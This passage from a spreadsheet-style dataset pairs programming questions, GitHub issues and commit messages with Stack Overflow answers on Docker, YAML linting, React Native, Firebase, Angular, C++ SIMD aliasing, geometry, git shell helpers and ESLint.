&lt;ol start="3"&gt;
&lt;li&gt;Verifying Open Ports:&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Ran docker ps and confirmed that PgAdmin is exposing port 5050.
Used netstat -tulnp and curl http://localhost:5050, but no response.&lt;/p&gt;
&lt;ol start="4"&gt;
&lt;li&gt;Checking Container Logs:&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Ran docker logs pgadmin but found no critical errors.&lt;/p&gt;
&lt;ol start="5"&gt;
&lt;li&gt;Firewall &amp;amp; Network Issues:&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Disabled firewall temporarily (sudo ufw disable).
Verified that Docker is using the bridge network (docker network inspect bridge).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C730</t>
  </si>
  <si>
    <t>Detecting and alerting of duplication keys/components/entries in YAML file
One of the possible approaches with using yamllint - https://stackoverflow.com/a/35149964
https://www.redhat.com/sysadmin/check-yaml-</t>
  </si>
  <si>
    <t>The yamllint command-line tool does what you want:
sudo pip install yamllint
Specifically, it has a rule key-duplicates that detects repetitions and keys over-writing one another:
$ yamllint test.yaml
test.yaml
  1:1       warning  missing document start "---"  (document-start)
  10:5      error    duplication of key "subkey5" in mapping  (key-duplicates)
(It has many other rules that you can enable/disable or tweak.)</t>
  </si>
  <si>
    <t xml:space="preserve">I'v e built a basic DAL which can retrieve data and a businesslayer with several objects using this DAL. Once I mapped the data into the business objects and done something with it, I also want to write the data back to the database. Some of the business objects have a lot of properties, so passing every value of a business object as parameter to a method of the corresponding dataservice is not a possibility.
Other ways I've been thinking of:
pass the business object to the the corresponding data service, there execute a SP with all the values as parameters. - sucks, because I have to pass a business object to the DAL (violating the separation) and probably end up with SPs with &gt;50 parameters
create an empty (?) dataset within the business object, fill it with the values from the business object, pass that dataset to the data service and update the db via a dataadapter. I thought of creating an empty dataset with a "... WHERE 0"-SQL String. Would that be a good practice?
This is the first time I do something like this. The latter sounds better to me, but maybe there are other, better approaches? Or The first one is better for some reasons I don't know?
Thank you very much!
[edit:] I can't use LinQ2SQL, cuz I use C# Express (which only supports querying local DBs, while mine is a remote one)
</t>
  </si>
  <si>
    <t>C731</t>
  </si>
  <si>
    <t>Deprecate Touchables
Is there an existing request?
 I have searched for this request: The Touchables are no longer recommended in React Native and have been replaced by Pressable. We should deprecate the Touchable components and mixin, and then remove them from React Native for Web. There has been the intent to deprecate them from React Native for a while, but the team hasn't had time to get around to it yet.
yes, its a good start, but without animation
i found this exemple very helpful https://stackoverflow.com/a/77743947</t>
  </si>
  <si>
    <t>Given the answer of @Adams:
Here is the code, which worked for me. You can customize it.
import { useRef } from 'react';
import { Pressable, Animated } from "react-native";
const PressableOpacity = ({ children, ...props }) =&gt; {
  const animated = useRef(new Animated.Value(1)).current;
  const fadeIn = () =&gt; {
    Animated.timing(animated, {
      toValue: 0.1,
      duration: 100,
      useNativeDriver: true,
    }).start();
  };
  const fadeOut = () =&gt; {
    Animated.timing(animated, {
      toValue: 1,
      duration: 200,
      useNativeDriver: true,
    }).start();
  };
  return (
    &lt;Pressable onPressIn={fadeIn} onPressOut={fadeOut} {...props}&gt;
      &lt;Animated.View style={{ opacity: animated }}&gt;{children}&lt;/Animated.View&gt;
    &lt;/Pressable&gt;
  );
};
export default PressableOpacity;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to display a message each time an operation of adding/deleting an item in/from Firebase is complete. These are the functions in the interface:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;suspend fun addItem(item: Item): Response&amp;lt;Unit&amp;gt;
suspend fun deleteItem(item: Item): Response&amp;lt;Unit&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;These are the implementations:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;override suspend fun addItem(item: Item) = try {
    itemsRef.add(item).await()
    Response.Success(Unit)
} catch (ex: Exception) {
    Response.Failure(ex)
}
override suspend fun deleteItem(item: Item) = try {
    itemsRef.document(item.id).delete().await()
    Response.Success(Unit)
} catch (ex: Exception) {
    Response.Failure(ex)
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In the ViewModel I call the &lt;code&gt;addItem&lt;/code&gt; and reset the state of the operations like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class ItemViewModel @Inject constructor(
    private val repo: ItemRepository
): ViewModel() {
    private val _addItemResponse = MutableStateFlow&amp;lt;Response&amp;lt;String&amp;gt;?&amp;gt;(null)
    val addItemResponse: StateFlow&amp;lt;Response&amp;lt;String&amp;gt;?&amp;gt; = _addItemResponse.asStateFlow()
    private val _deleteItemResponse = MutableStateFlow&amp;lt;Response&amp;lt;String&amp;gt;?&amp;gt;(null)
    val deleteItemResponse: StateFlow&amp;lt;Response&amp;lt;String&amp;gt;?&amp;gt; = _deleteItemResponse.asStateFlow()
    fun addItem(item: Item) = viewModelScope.launch {
        _addItemResponse.value = Response.Loading
        _addItemResponse.value = repo.addItem(item)
    }
    fun deleteItem(item: Item) = viewModelScope.launch {
        _deleteItemResponse.value = Response.Loading
        _deleteItemResponse.value = repo.addItem(item)
    }
    fun resetAddItemState() = _addItemResponse.value?.let {
        _addItemResponse.value = null
    }
    fun resetDeleteItemState() = _deleteItemResponse.value?.let {
        _deleteItemResponse.value = null
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And inside the UI I use:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;when(val addItemResponse = viewModel.addItemResponse.collectAsStateWithLifecycle().value) {
    is Response.Loading -&amp;gt; CircularProgressIndicator()
    is Response.Success -&amp;gt; {
        Toast.makeText(context, &amp;quot;Added&amp;quot;, Toast.LENGTH_LONG).show()
        resetAddItemState()
    }
    is Response.Failure -&amp;gt; Text(addItemResponse.ex)
}
when(val deleteItemResponse = viewModel.deleteItemResponse.collectAsStateWithLifecycle().value) {
    is Response.Loading -&amp;gt; CircularProgressIndicator()
    is Response.Success -&amp;gt; {
        Toast.makeText(context, &amp;quot;Deleted&amp;quot;, Toast.LENGTH_LONG).show()
        resetDeleteItemState()
    }
    is Response.Failure -&amp;gt; Text(deleteItemResponse.ex)
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I add an item, the first toast is displayed. If I delete an item and wait for the second toast to disappear, the second toast is displayed correctly. However, if I add an item and delete it right away without waiting for the first toast to disappear, the second toast is &lt;strong&gt;not&lt;/strong&gt; displayed. How to solve this issue?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C732</t>
  </si>
  <si>
    <t>Angular To Support menu/dialog/overlay on parentElement instead of document always
Feature Description
AngularJS was giving us option to select alert dialog on a parent element from document query selector.
https://material.angularjs.org/latest/demo/dialog
The same is missing in angular.
$mdDialog.alert()
.parent(angular.element(document.querySelector('#popupContainer')))
.clickOutsideToClose(true)
Use Case
Some application would disable overflow at window/document level and capture the overflow of body.
For such applications, the menu and headers should be available to access while dialog/even-mat-menu is opened on main body section.
That way user is not blocked to get out of menu/dialog before selecting some other item on header. Ex. search, more, or profile details on header.
Especially this will be useful on corporate projects where there will be single UI to handle lot of data.
Associated discussion is here:
https://stackoverflow.com/questions/67551037/angularjs-dialog-has-option-to-select-parent-element-reference-seems-angular-2</t>
  </si>
  <si>
    <t>The angularjs has option to supply parent element on which the pop-up or dialog to be opened.
https://material.angularjs.org/latest/demo/dialog
$mdDialog.alert()
     .parent(angular.element(document.querySelector('#popupContainer')))
     .clickOutsideToClose(true)
Seems the same is not available easily on angular.
Does anyone able to crack this or have workaround for anular 8+?
Requirement is:
We would like to open the popup only on the selective area of entire window/document.
Say we have header, Left Menu, Body and footer. We would like to open dialog only on the area of body without hiding/cdk-backdrop header, menu and footers.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm trying to come up with a methodology for when to use Data Transfer Objects and when to use DataTables.
As an example of the problem I'm facing in our system...
We have 6 different business entity assemblies representing the same things but with different properties.  They have been created by several developers concerned with different problems over a period of several years.   
For example different applications using the "Bicycle" class over the years were concerned with different properties of the bicycle.  So they called different data methods that only retrieved and populated the properties they were concerned with.
Data Service 1 Populates
Brand
Color
Data Service 2 Populates
Gears
Tire Size
and each uses a different business entity.  Clearly this is ridiculous, you can't be creating a new class for every possible combination of properties.
My gut feeling tells me that if this is a problem then we should probably be using an ORM.
But for the time being I want to say.  
If you are populating or returning an entire row from a table then use the DTO / Business Entity that matches the database.  
If you are returning a random set of properties then use a datatable.
Could anybody offer some guidance?
Thanks
</t>
  </si>
  <si>
    <t>C733</t>
  </si>
  <si>
    <t>Duplicate class when using BoM 
[REQUIRED] Step 2: Describe your environment
Android Studio version: 4.1
Firebase Component: 25.12.0 BoM
Component version: 24.1.0
[REQUIRED] Step 3: Describe the problem
Steps to reproduce:
Create a blank project with a simple blank activity, which only contains the following two implementations, and try and build the app in Android Studio.
Results in duplicate class errors such as this:
Duplicate class com.google.android.gms.internal.vision.zze found in modules jetified-play-services-vision-20.0.0-runt
(jetifier to false makes no difference android.enableJetifier=false)
Relevant Code:
dependencies {
    implementation platform('com.google.firebase:firebase-bom:25.12.0')
    implementation "com.google.firebase:firebase-ml-vision"
}
Full example in this SO post - https://stackoverflow.com/questions/64502154/duplicate-class-in-firebase-common-and-jetified-firebase-components-with-library - Includes debugging information</t>
  </si>
  <si>
    <t>add these lines to android &gt; app &gt; build.gradle
implementation 'com.google.firebase:firebase-core:17.3.0'
implementation 'com.google.firebase:firebase-messaging:20.1.5'
cd android &gt;
.gradlew clean
cd ..  &gt;
npm start -reset-cache
check now 😋</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a training system built with Google Workspace where:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;System Structure:
&lt;ul&gt;
&lt;li&gt;Master templates (forms, docs) are stored in admin-only accessible location&lt;/li&gt;
&lt;li&gt;Each student has their own folder with contributor access&lt;/li&gt;
&lt;li&gt;Files are copied from templates to student folders&lt;/li&gt;
&lt;li&gt;Students have editor access to their copies&lt;/li&gt;
&lt;li&gt;Students cannot access Apps Script&lt;/li&gt;
&lt;li&gt;Shared drive is used for file management&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Current Challenge:
&lt;ul&gt;
&lt;li&gt;Need to set up form creation assignments where students edit forms&lt;/li&gt;
&lt;li&gt;Template form has a script with onFormSubmit function for checking student work&lt;/li&gt;
&lt;li&gt;When form is copied to student folders, Triggers don't copy with forms&lt;/li&gt;
&lt;li&gt;Need to automate trigger setup&lt;/li&gt;
&lt;li&gt;Students can't access Apps Script to set up triggers themselves&lt;/li&gt;
&lt;li&gt;I want the trigger to be set automatically either while copying the form, onOpen   or onSubmit&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Is this possible? and how can I do this? The code is in my web app, having admin access.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (isForm) {
    debugMsg += '\nStarting form setup process';
    try {
        // Step 1: Verify form access
        const form = FormApp.openById(copyResponse.id);
        Logger.log('âœ“ Successfully opened form');
        // Step 2: Configure form settings
        form.setCollectEmail(true)
            .setAllowResponseEdits(false)
            .setAcceptingResponses(true);
        Logger.log('âœ“ Configured form settings');
        // Step 3: Create trigger right here
        const trigger = ScriptApp.newTrigger('onFormSubmit')                                  
          .forForm(form)
          .onFormSubmit()
          .create();
        debugMsg += '\nCreated form submit trigger';
        if (accessLevel.toLowerCase() === 'editor') {
            newFile.addEditor(studentEmail);
            debugMsg += `\nGave editor access`;
        } else {
            newFile.addViewer(studentEmail);
            debugMsg += `\nGave viewer access`;
        }
    } catch (error) {
        Logger.log('âŒ ERROR: ' + error.toString());
        debugMsg += '\nError in setup: ' + error.toString();
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C734</t>
  </si>
  <si>
    <t>Decouple neppM and neppV in vectorised C++ code?
This is a spinoff of vectorisation issue #71 and a followup to the big PR #171.
It is also somewhat related to issue #175 about the xxx function interface.
Presently, there are are at least three types of (AO)SOA structures in the code, determined by three parameters
neppR determines the number of events per page in the AOSOA random number array. This is hardcoded for all (cuda, cpp, double, float, all SIMD, no SIMD...) configurations, so that the same physics results are obtained. It is essentially an internal parameter of the phase space sampler (rambo), while it does not even need to be known to the random engine itself. The random engine creates a flat array of random numbers, then rambo assignes these to different events according to neppR.
neppM is the number of events per page in the AOSOA momenta data structure. It is known to the xxx function interface (as allmomenta, see issue "xxx" function interface: further separation of data access and calculations? #175) and it is known to rambo (the getMomentaInitial and getMomentaFinal functions). This is about how the encoding/decoding of momenta in memory is done, in both c++ and cuda. For cuda, this is tuned to a reasonable value to have coalesced memory access, fitting in 32-byte cache lines (see the studies in issue AOS/SOA for input particle 4-momenta (and random numbers) #16). For c++, this is presently coupled to neppV for vectorisation, see next bullet.
neppV is the size of the vectors used in SIMD vectorized operations. This is dictated by which type of vectorization one wants to have (none:1, SSE42 ie 128bit: 2 doubles, AVX2 ie 256 bit: 4 doubles, 512y ie AVX512 with 256 bit: 4 doubles, 512z ie AVX512 with 512 bit: 8 doubles).
Presently, the implementation of vectorization couples the AOSOA momenta structure and the wavefunction vectorization by assuming neppM == neppV. This is worse than hardcoded, it is just an assumption throughout the code.
However, there is in principle no strict need to have neppM == neppV:
one could have an AOSOA where each momenta event page fits 2 or 4 or more SIMD vectors, i.e. neppM=2neppV or neppM=4neppV and so on
and one could even test the performance of the code without AOSOA and with an AOS instead, i.e. with neppM=1
About the latter point, the critical issue is that there are two separate contributions to the speedup from the vectorized implementation, one from data access and one from calculations
the SIMD calculation is most likely that is most important: when doing a sum for 4 events, an AVX2 implementation does a single processor instruction instead of 4
however, there is also a contribution (to be assessed) from data access: if the momenta already are in an AOSOA with at least 4 events contiguous to one another, then copying these to the fptype_v which is fed to the xxx functions is faster than if data have to be collected more randomly from memory
The main benefit of decouplking neppM and neppV would be to improve the modularity and encapsulation of the code, avoinding these dangerous hidden assumptions through independent components (now rambo and ME calculations are in a way tightly coupled by the assumption neppV=neppM). Eventually, this may also be useful/needed to make it easier to interface to fortran code.
Final comment, a few useful links
reinterpret cast and vectors : https://stackoverflow.com/questions/52112605/is-reinterpret-casting-between-hardware-simd-vector-pointer-and-the-correspond, https://stackoverflow.com/questions/47510783/why-does-unaligned-access-to-mmaped-memory-sometimes-segfault-on-amd64
new and alignas : https://en.cppreference.com/w/cpp/language/new , https://www.bfilipek.com/2019/08/newnew-align.html#requesting-different-alignment, https://stackoverflow.com/questions/15511909/does-the-alignas-specifier-work-with-new</t>
  </si>
  <si>
    <t>ISO C++ doesn't define __m256, so we need to look at what does define their behaviour on the implementations that support them.
Intel's intrinsics define vector-pointers like __m256* as being allowed to alias anything else, the same way ISO C++ defines char* as being allowed to alias.  (But not vice-versa: it's UB and breaks in practice to point an int* at a __m256i and deref it.)
So yes, it's safe to dereference a __m256* instead of using a _mm256_load_ps() aligned-load intrinsic.
But especially for float/double, it's often easier to use the intrinsics because they take care of casting from float*, too.  For integers, the AVX512 load/store intrinsics are defined as taking void*, but AVX2 and earlier need a cast like (__m256i*)&amp;arr[i] which is pretty clunky API design and clutters up code using it.
A few non-AVX512 intrinsics have also been added using void* like movd/movq load/store alignment and aliasing safe intrinsics such as _mm_loadu_si32(void*).  Previously I think Intel assumed you'd use _mm_cvtsi32_si128 which required getting an int loaded safely yourself, which meant using memcpy to avoid UB (at least on compilers other than classic ICC and MSVC, if they allow unaligned int* as well as not enforcing strict aliasing).  This might have been around the time Intel started looking at migrating to LLVM for ICX/ICPX / OneAPI, and realizing how much of a mess it was to deal with narrow loads on compilers that enforce strict aliasing.
To learn some about what the intrinsics API required, we can look at the non-portable implementation details of GCC.  Presumably they inferred from Intel examples or documentation what behaviour was necessary, or some Intel engineers may have sent patches.  (You shouldn't rely on the GCC details because it's not documented and other compilers that implement __m256 and other intrinsic types might do things differently.  But we can see that GCC had to explicitly allow aliasing that wouldn't otherwise be safe.)
In GCC, this is implemented by defining __m256 with a may_alias attribute:  from gcc7.3's avxintrin.h (one of the headers that &lt;immintrin.h&gt; includes):
/* The Intel API is flexible enough that we must allow aliasing with other
   vector types, and their scalar components.  */
typedef float __m256 __attribute__ ((__vector_size__ (32),
                                     __may_alias__));
typedef long long __m256i __attribute__ ((__vector_size__ (32),
                                          __may_alias__));
typedef double __m256d __attribute__ ((__vector_size__ (32),
                                       __may_alias__));
/* Unaligned version of the same types.  */
typedef float __m256_u __attribute__ ((__vector_size__ (32),
                                       __may_alias__,
                                       __aligned__ (1)));
typedef long long __m256i_u __attribute__ ((__vector_size__ (32),
                                            __may_alias__,
                                            __aligned__ (1)));
typedef double __m256d_u __attribute__ ((__vector_size__ (32),
                                         __may_alias__,
                                         __aligned__ (1)));
(In case you were wondering, this is why dereferencing a __m256* is like _mm256_store_ps, not storeu.  storeu casts the pointer arg to the _u type defined with aligned(1).)
GNU C native vectors without may_alias are allowed to alias their scalar type,  e.g. even without the may_alias, you could safely cast between float* and a hypothetical v8sf type.  But may_alias makes it safe to load from an array of int[], char[], or whatever.
Other behaviour Intel's intrinsics require to be defined
Using Intel's API for _mm_storeu_si128( (__m128i*)&amp;arr[i], vec); requires you to create potentially-unaligned pointers which would fault if you deferenced them.  And _mm_storeu_ps to a location that isn't 4-byte aligned requires creating an under-aligned float*.
Just creating unaligned pointers, or pointers outside an object, is UB in ISO C++, even if you don't dereference them.  I guess this allows implementations on exotic hardware which do some kinds of checks on pointers when creating them (possibly instead of when dereferencing), or maybe which can't store the low bits of pointers.  (I have no idea if any specific hardware exists where more efficient code is possible because of this UB.)
But implementations which support Intel's intrinsics must define the behaviour, at least for the __m* types and float*/double*.  This is trivial for compilers targeting any normal modern CPU, including x86 with a flat memory model (no segmentation); pointers in asm are just integers kept in the same registers as data.  (m68k has address vs. data registers, but it never faults from keeping bit-patterns that aren't valid addresses in A registers, as long as you don't deref them.)
Going the other way: element access of a vector.
Note that may_alias, like the char* aliasing rule, only goes one way: it is not guaranteed to be safe to use int32_t* to read a __m256.  It might not even be safe to use float* to read a __m256.  Just like it's not safe to do char buf[1024];  int *p = (int*)buf;.
See https://stackoverflow.com/q/71364764 for a real-world example of GCC breaking code that points an int* into a __m256i vec; object.  Not a dereferenced __m256i* ; that would be safe if the only __m256i accesses were via __m256i*.  Because it's a may_alias type, the compiler can't infer that the underlying object is an __m256i; that's the whole point, and why it's safe to point it at an int arr[] or whatever.
GCC/clang define __m128i / __m256i as a vector of 2 or 4 long long elements, and __m128 / __m256 as a vector of 4 or 8 float elements, etc.  GCC manual for Vector Extensions.  These might count as real long long or float objects you can safely point a long long* or float* at, but GCC doesn't explicitly document that even for its native vector types (but it does define [] indexing).  Even if they did, that would be an implementation detail for how GCC and Clang define Intel's vector types in terms of GNU or Clang vectors, not documented or guaranteed portable.  Except to MSVC which allow anything to alias anything, like -fno-strict-aliasing.   (And I think classic ICC was also like that, unlike LLVM-based ICX)
Reading/writing through a char* can alias anything, but when you have a char object, strict-aliasing does make it UB to read it through other types.  (I'm not sure if the major implementations on x86 do define that behaviour, but you don't need to rely on it because they optimize away memcpy of 4 bytes into an int32_t.  You can and should use memcpy to express an unaligned load from a char[] buffer, because auto-vectorization with a wider type is allowed to assume 2-byte alignment for int16_t*, and make code that fails if it's not: https://stackoverflow.com/questions/47510783/why-does-unaligned-access-to-mmaped-memory-sometimes-segfault-on-amd64)
A char arr[] may not be a great analogy because arr[i] is defined in terms of *(arr+i), so there actually is a char* deref involved in accessing the array as char objects.  Perhaps some char members of a struct would be a better example, then.
To insert/extract vector elements, use shuffle intrinsics, SSE2 _mm_insert_epi16 / _mm_extract_epi16 or SSE4.1 insert / _mm_extract_epi8/32/64.  For float, there are no insert/extract intrinsics that you should use with scalar float.
Or store to an array and read the array.  (https://stackoverflow.com/questions/13257166/print-a-m128i-variable/46752535#46752535).  This does actually optimize away to vector extract instructions.
GNU C vector syntax provides the [] operator for vectors, like __m256 v = ...;  v[3] = 1.25;.  MSVC defines vector types as a union with a .m128_f32[] member for per-element access.
There are wrapper libraries like Agner Fog's (now Apache-licensed) Vector Class Library which provide portable operator[] overloads for their vector types, and operator + / - / * / &lt;&lt; and so on.  It's quite nice, especially for integer types where having different types for different element widths make v1 + v2 work with the right size.  (GNU C native vector syntax does that for float/double vectors, and defines __m128i as a vector of signed int64_t, but MSVC doesn't provide operators on the base __m128 types.)
You can also use union type-punning between a vector and an array of some type, which is safe in ISO C99, and in GNU C++, but not in ISO C++.  I think it's officially safe in MSVC, too, because I think the way they define __m128 as a normal union.
There's no guarantee you'll get efficient code from any of these element-access methods, though.  Do not use inside inner loops, and have a look at the resulting asm if performance matters.</t>
  </si>
  <si>
    <t xml:space="preserve">I don't really see the point of [external-link].  I know the probability of a collision is effectively nil, but effectively nil is not even close to impossible.
Can somebody give an example where you have no choice but to use UUID?  From all the uses I've seen, I can see an alternative design without UUID.  Sure the design might be slightly more complicated, but at least it doesn't have a non-zero probability of failure.
UUID smells like global variables to me.  There are many ways global variables make for simpler design, but its just lazy design.
</t>
  </si>
  <si>
    <t>C735</t>
  </si>
  <si>
    <t>feat!: Add first proper map and restructure Obstacle
This commit entails the following changes:
  - Add a debug feature to print the mouse position to console
  - Restructure the obstacle.rs
  - Modularize spawning of walls
  - Spawn maps based on function calls
  - Restructure collision detection to use rect/sphere and not rect/rect
    (restructure taken from https://stackoverflow.com/a/1879223/18948596)</t>
  </si>
  <si>
    <t>There are only two cases when the circle intersects with the rectangle:
Either the circle's centre lies inside the rectangle, or
One of the edges of the rectangle has a point in the circle.
Note that this does not require the rectangle to be axis-parallel.
(One way to see this: if none of the edges has a point in the circle (if all the edges are completely "outside" the circle), then the only way the circle can still intersect the polygon is if it lies completely inside the polygon.)
With that insight, something like the following will work, where the circle has centre
P
and radius
R
, and the rectangle has vertices
A
,
B
,
C
,
D
in that order (not complete code):
def intersect(Circle(P, R), Rectangle(A, B, C, D)):
    S = Circle(P, R)
    return (pointInRectangle(P, Rectangle(A, B, C, D)) or
            intersectCircle(S, (A, B)) or
            intersectCircle(S, (B, C)) or
            intersectCircle(S, (C, D)) or
            intersectCircle(S, (D, A)))
If you're writing any geometry you probably have the above functions in your library already. Otherwise,
pointInRectangle()
can be implemented in several ways; any of the general
point in polygon
methods will work, but for a rectangle you can just check whether this works:
0 ≤ AP·AB ≤ AB·AB and 0 ≤ AP·AD ≤ AD·AD
And
intersectCircle()
is easy to implement too: one way would be to check if the foot of the perpendicular from
P
to the line is close enough and between the endpoints, and check the endpoints otherwise.
The cool thing is that the
same
idea works not just for rectangles but for the intersection of a circle with any
simple polygon
— doesn't even have to be convex!</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I followed the official document step by step:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;cd vscode&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;npm install&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;Ctrl+Shift+B&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;When starting a project, execute:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;.\scripts\code.bat&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;The error I'm getting is:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;E:\projectCode\ai-ide\vscode&amp;gt; .\scripts\code.bat &amp;gt; code-oss-dev@1.98.0
electron &amp;gt; node build/lib/electron node:events:509 throw err; //
Unhandled 'error' event ^ Error [ERR_UNHANDLED_ERROR]: Unh Node.js
v20.18.1 '&amp;quot;.build\electron\Code - OSS.exe&amp;quot;' is not recognized as an
internal or external command&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I can run VSCode locally normally.&lt;/p&gt;
&lt;p&gt;How to solve the running error?
thank you.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://i.sstatic.net/tOSlzlyf.png" alt="enter image description here" /&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C736</t>
  </si>
  <si>
    <t>prepublish -&gt; (pre|post)version hooks, fixes #31; improve modularity, f
ixes #32; the Babel update script now saves an exact version of the runtime, fixes #30; improve example code; bump deps
`npm run require-clean-work-tree` logic adapted from:
- https://github.com/git/git/blob/a5fe66802f8c4036badd54ff36ff327d43236e7e/git-sh-setup.sh#L202
- http://stackoverflow.com/a/2659808/1331430</t>
  </si>
  <si>
    <t>Great timing! I wrote a blog post about exactly this a few days ago, when I figured out how to add git status information to my prompt.
Here's what I do:
For dirty status:
# Returns "*" if the current git branch is dirty.
function evil_git_dirty {
  [[ $(git diff --shortstat 2&gt; /dev/null | tail -n1) != "" ]] &amp;&amp; echo "*"
}
For untracked files (Notice the
--porcelain
flag to
git status
which gives you nice parse-able output):
# Returns the number of untracked files
function evil_git_num_untracked_files {
  expr `git status --porcelain 2&gt;/dev/null| grep "^??" | wc -l` 
}
Although
git diff --shortstat
is more convenient, you can also use
git status --porcelain
for getting dirty files:
# Get number of files added to the index (but uncommitted)
expr $(git status --porcelain 2&gt;/dev/null| grep "^M" | wc -l)
# Get number of files that are uncommitted and not added
expr $(git status --porcelain 2&gt;/dev/null| grep "^ M" | wc -l)
# Get number of total uncommited files
expr $(git status --porcelain 2&gt;/dev/null| egrep "^(M| M)" | wc -l)
Note: The
2&gt;/dev/null
filters out the error messages so you can use these commands on non-git directories. (They'll simply return
0
for the file counts.)
Edit
:
Here are the posts:
Adding Git Status Information to your Terminal Prompt
Improved Git-enabled Shell Prompt</t>
  </si>
  <si>
    <t xml:space="preserve">I am seeking some web architecture advice: I would like to know how to share common files, e.g. stylesheets, amongst web applicaitons that span virtual directories and many developers as opposed to having redundant files within each project?  What are some recommendations?
</t>
  </si>
  <si>
    <t>C737</t>
  </si>
  <si>
    <t>⛏️ Fix Key Selection Page and Upgrade to MUI 5 (#111)
* Fix key selection page to work with nswag
* Fixed all the annoying warnings
* Set keyCeremony on selection
* npm upgrades and npm audit fix
* Deprecate the old KeyCeremony to resolve conflicts
* Add mui v5 packages
* variant-prop codemod
* Update react-scripts in api-client
* Upgrade all the linters
* Reverting accidental change to library
* Fixing UI overlap problem in input style
see also: mui/material-ui#14530 (comment)
* npm audit fix --force
* Fix "Function component is not a function declaration"
https://stackoverflow.com/a/69931909/40783
* Migrate data grid to mui 5
* Fix linting errors in default layout
* Fix error on reload ERROR in Plugin "react" was conflicted between ".eslintrc.json" and "BaseConfig
https://stackoverflow.com/a/70790903/40783
* Fix data grid error with no rows overlay
* Fix mui error on election setup wizard page
* Fixing new linting errors from upgrade to eslint ^8.7 and airbnb to ^19
* Fix linting errors in AuthenticatedLayout
* Fix linting error ESLint couldn't determine the plugin "@typescript-eslint" uniquely.
https://stackoverflow.com/a/68270742/40783
* Fixing yet more linting problems in admin-app and result-app
* Fix linting errors in /library, mostly by deleting duplicate components</t>
  </si>
  <si>
    <t>Ok, so I don't know if it is the correct answer, but finally changing the settings in Eslint helped me to change the type of function for Components. I added the following rule to my .eslintrc.js file:
"react/function-component-definition": [
  2,
  {
    namedComponents: "arrow-function",
    unnamedComponents: "arrow-function",
  },
],
With this, eslint will ONLY accept arrow functions for Components, rather than function expressions (as default).</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to get an output from a function to write into a file, but it doesn't seem to work since I get an error on the &lt;code&gt;&amp;lt;&amp;lt;&lt;/code&gt; part of the code. I'll put my code that I have here to show you, along with where the error is.&lt;/p&gt;
&lt;p&gt;Main.cpp&lt;/p&gt;
&lt;pre class="lang-cpp prettyprint-override"&gt;&lt;code&gt;#include &amp;lt;iostream&amp;gt;
#include &amp;lt;fstream&amp;gt;
#include &amp;quot;stringClass.h&amp;quot;
int main() {
     std::fstream file;
    file.open(&amp;quot;testingStringClass.txt&amp;quot;, std::ios::out);
    file &amp;lt;&amp;lt; &amp;quot;Testing write to file&amp;quot; &amp;lt;&amp;lt; std::endl;
    std::cout &amp;lt;&amp;lt; &amp;quot;\n-------------------------&amp;quot; &amp;lt;&amp;lt; std::endl;
    std::cout &amp;lt;&amp;lt; &amp;quot;testing write to console&amp;quot; &amp;lt;&amp;lt; std::endl;
    std::cout &amp;lt;&amp;lt; &amp;quot;\n-------------------------\n&amp;quot; &amp;lt;&amp;lt; std::endl;
    String text = String(&amp;quot;Hello World!&amp;quot;); 
    text.WriteToConsole(); 
     file &amp;lt;&amp;lt; text.WriteToConsole() &amp;lt;&amp;lt; std::endl;
  return 0;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;stringClass.cpp&lt;/p&gt;
&lt;pre class="lang-cpp prettyprint-override"&gt;&lt;code&gt;#include &amp;lt;iostream&amp;gt;
#include &amp;lt;fstream&amp;gt;
#include &amp;lt;string&amp;gt;
#include &amp;quot;stringClass.h&amp;quot;
#include &amp;lt;string.h&amp;gt;
String::String(){ // constructor
    m_maxSize = 10; // sets max size for the char array
    m_currentSize = 0; // sets the current size of the char array
    m_baseString = new char[m_maxSize]; // this is the char array for the pointer in stringClass.h
}
String::String(const char* _str) { // constructor, the _str is just shorthand for the array
    for (int i = 0; _str[i] != '\0'; i++) { // cycles through the C string to calculate it's size
        m_currentSize = i + 1; // needs to have +1 to account for index 0
    } 
    m_maxSize = m_currentSize * 2; // doing this so we don't have to constantly change the array max size, we just make the max size double the current size.
    m_baseString = new char[m_maxSize];
    for (int i = 0; _str[i] != '\0'; i++) {
        m_baseString[i] = _str[i];
    }
    m_baseString[m_currentSize] = '\0'; // adds null terminator to the end of the string array
}
String::String(const String&amp;amp; _other) {
    m_baseString = new char[_other.m_maxSize]; // creates new C string, fixed bug where this didn't work by making size equal to _other.m_maxSize
    for (int i = 0; _other.m_baseString[i] != '\0'; i++) { // don't worry about this error it'll be fine
        m_currentSize = i + 1; // needs to have +1 to account for index 0
    }
